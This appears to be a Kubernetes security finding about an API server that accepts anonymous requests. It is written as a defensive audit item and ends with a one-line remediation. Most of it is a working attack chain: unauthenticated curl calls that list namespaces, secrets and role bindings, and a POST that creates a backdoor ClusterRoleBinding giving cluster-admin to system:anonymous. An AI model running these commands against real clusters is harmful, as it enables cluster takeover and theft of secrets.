API server --anonymous-auth is not explicitly set to false. Unauthenticated requests can enumerate cluster resources.
CRITICAL - API server accepts unauthenticated requests; anonymous callers can enumerate cluster resources, and any RBAC binding to system:anonymous escalates to full API access
- Kubernetes API server accessible without any authentication token or certificate
- Anonymous callers are assigned system:anonymous user and system:unauthenticated group
- Any RBAC ClusterRoleBinding to system:anonymous or system:unauthenticated = unauthenticated API access
- Anonymous enumeration reveals cluster topology, workloads, and RBAC configuration
- [CHAIN: Anonymous API Access โ Resource Enumeration โ RBAC Misconfiguration โ Cluster Takeover]
- Step 1 โ Discover API server URL from kubeconfig or cluster DNS
- Step 2 โ Query API without credentials: curl -sk https://$API_SERVER/api/v1/namespaces
- Step 3 โ Enumerate resources: pods, secrets, configmaps, clusterroles, bindings
- Step 4 โ Check if system:anonymous has dangerous RBAC grants: kubectl auth can-i --list --as=system:anonymous
- Step 5 โ If any write permission exists: create backdoor ClusterRoleBinding or deploy malicious pod
- Result: Anonymous access + any RBAC misconfiguration = full cluster compromise without credentials
# CRITICAL: API Server Anonymous Access Enabled
# Get the API server address from current kubeconfig
API_SERVER=$(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}')
echo "API Server: $API_SERVER"
# Test unauthenticated access (no token, no cert)
curl -sk $API_SERVER/api/v1/namespaces | python3 -c \
"import sys,json; [print(n['metadata']['name']) for n in json.load(sys.stdin)['items']]"
# Enumerate resources without authentication
curl -sk $API_SERVER/api/v1/secrets
curl -sk $API_SERVER/apis/rbac.authorization.k8s.io/v1/clusterrolebindings
# Check what anonymous can actually do
kubectl auth can-i --list --as=system:anonymous -A
# If anonymous has any write access โ create backdoor
curl -sk -X POST $API_SERVER/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
-H "Content-Type: application/json" \
-d '{"apiVersion":"rbac.authorization.k8s.io/v1","kind":"ClusterRoleBinding",
"metadata":{"name":"anon-admin"},
"roleRef":{"kind":"ClusterRole","name":"cluster-admin","apiGroup":"rbac.authorization.k8s.io"},
"subjects":[{"kind":"User","name":"system:anonymous","apiGroup":"rbac.authorization.k8s.io"}]}'
# REMEDIATION: Set --anonymous-auth=false on kube-apiserver:
# /etc/kubernetes/manifests/kube-apiserver.yaml: add --anonymous-auth=false